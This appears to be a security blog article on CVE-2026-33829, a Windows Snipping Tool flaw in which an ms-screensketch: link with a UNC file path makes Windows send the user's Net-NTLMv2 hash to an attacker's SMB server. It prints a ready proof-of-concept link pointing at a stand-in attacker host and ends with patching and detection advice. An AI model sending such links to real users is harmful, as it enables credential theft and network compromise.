What if taking a screenshot handed your password to a hacker?

On April 14, 2026, Microsoft patched a vulnerability that sounds like a prank but is devastatingly real. CVE-2026-33829 affects the Windows Snipping Tool — the same screenshot utility millions of users open daily without a second thought. And it can be weaponized to steal your password hash with a single click.

The Attack Chain: Stupidly Simple, Terrifyingly Effective

Here is how it works:

  1. An attacker crafts a malicious link using the ms-screensketch: URI scheme — the deep-link protocol Windows uses to open images directly in Snipping Tool.
  2. The link points the filePath parameter to a UNC path on an attacker-controlled SMB server: \\attacker.server\image.png
  3. The victim clicks the link (phishing email, social media DM, compromised website — anything works).
  4. Windows prompts: "Open Snipping Tool?" The user clicks yes.
  5. Snipping Tool attempts to load the "image" from the remote server. Windows silently authenticates using the current user's credentials.
  6. The attacker's SMB server captures the Net-NTLMv2 hash — enough to crack offline or relay into other systems.

Full PoC link looks like this:

ms-screensketch:edit?&filePath=\\attacker.server\file.png&isTemporary=false&saved=true&source=Toast

That is it. No exploit. No zero-day buffer overflow. No malware payload. Just a URI handler doing exactly what it was designed to do — and leaking your credentials in the process.

Why This Is Worse Than It Looks

Microsoft rated this moderate severity (CVSS 4.3). Security researchers disagree — loudly.

Here is why the real-world risk is critical:

  • No admin rights needed. Any standard user clicking the link triggers the leak.
  • Enterprise environments are juicy targets. NTLM hashes in Active Directory domains enable lateral movement, privilege escalation, and full domain compromise.
  • Social engineering is trivial. "Check out this screenshot of your account" is way more convincing than "Download this executable."
  • Snipping Tool is trusted. Users have been trained to treat it as harmless. Your EDR will not flag it. Your antivirus will not blink.

The Root Cause: Trust Without Verification

The vulnerability stems from how Snipping Tool's filePath parameter handles remote paths. The application initiates an SMB connection to load the image file — but it never validates whether that path is safe. It blindly trusts any UNC path you feed it, including attacker-controlled servers.

Once Windows initiates the SMB handshake, the Net-NTLMv2 hash is transmitted automatically. The attacker does not need to crack it immediately — they can relay it to other services, or take it offline for brute-force cracking. Weak passwords fall in minutes. Complex passwords might take days. But in enterprise environments, one hash often leads to dozens more.

What You Should Do Right Now

If you are on Windows:

  • Install the April 2026 Patch Tuesday updates immediately. Microsoft patched this on April 14.
  • Consider disabling NTLM where possible (though this breaks legacy systems in many environments).
  • Train users to treat ms-screensketch: links with the same suspicion as any other unexpected link.

If you are a defender:

  • Monitor for outbound SMB connections initiated by Snipping Tool processes.
  • Block ms-screensketch: URI handling at the browser/email gateway level if not business-critical.
  • Audit for NTLM usage across your network — this attack is just one of many ways these hashes get stolen.

The Bigger Picture

This vulnerability is a perfect example of what happens when trusted applications become attack vectors. The Snipping Tool is not malicious. It is not buggy in the traditional sense. It simply trusts too much. And in cybersecurity, trust is the enemy.

We have seen this pattern before — legitimate software abused for credential theft (think Outlook CVE-2023-23397 and its NTLM leak). But Snipping Tool is uniquely dangerous because it feels so innocent. Who suspects their screenshot utility?

The answer, after April 14, 2026: everyone should.

CVE-2026-33829 | CVSS 4.3 (Moderate — debatable) | Patched: April 14, 2026 | Affected: Windows Snipping Tool | Attack vector: URI handler + UNC path